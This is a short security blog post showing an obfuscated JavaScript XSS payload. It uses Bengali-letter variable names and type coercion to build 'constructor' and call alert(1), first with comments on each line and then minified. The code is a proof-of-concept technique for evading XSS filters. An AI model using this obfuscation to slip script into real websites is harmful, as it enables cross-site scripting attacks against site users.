#XSS Payload in #Bengali #Obfuscated

unicode Jul 30, 2020

Without any further explanation - look at the code

ক = ''              // empty string
খ = !ক + ক          // "true"
গ = !খ + ক          // "false"
ঘ = ক + {}          // "[object Object]"
ঙ = খ[ক++]          // "t" = "true"[0]
চ = খ[জ = ক]        // "r" = "true"[1]
ছ = ++জ + ক         // 2, 3
ঝ = ঘ[জ + ছ]        // "c"

খ[
  ঝ +=              // "c"
    ঘ[ক] +          // "o" = "object"[0]
    (খ.গ+ঘ)[ক] +    // "n" = "undefined"[1]
    গ[ছ] +          // "s" = "false"[3]
    ঙ +             // "t"
    চ +             // "r"
    খ[জ] +          // "u" = "true"[2]
    ঝ +            // "c" = "[object]"[5]
    ঙ +             // "t"
    ঘ[ক] +          // "o" = "[object]"[1]
    চ               // "r"
][
  ঝ                 // "constructor"
](
  গ[ক] +            //  "a"
  গ[জ] +            //  "l"
  খ[ছ] +            //  "e"
  চ +               //  "r"
  ঙ +               //  "t"
  "(ক)"             // "(1)"
)()
Code with Comment

And minified final JS for alert(1) with obfuscation

ক="",খ=!ক+ক,গ=!খ+ক,ঘ=ক+{},ঙ=খ[ক++],চ=খ[জ=ক],ছ=++জ+ক,ঝ=ঘ[জ+ছ],খ[ঝ+=ঘ[ক]+(খ.গ+ঘ)[ক]+গ[ছ]+ঙ+চ+খ[জ]+ঝ+ঙ+ঘ[ক]+চ][ঝ](গ[ক]+গ[জ]+খ[ছ]+চ+ঙ+"(ক)")();

Tags

Great! You've successfully subscribed.
Great! Next, complete checkout for full access.
Welcome back! You've successfully signed in.
Success! Your account is fully activated, you now have access to all content.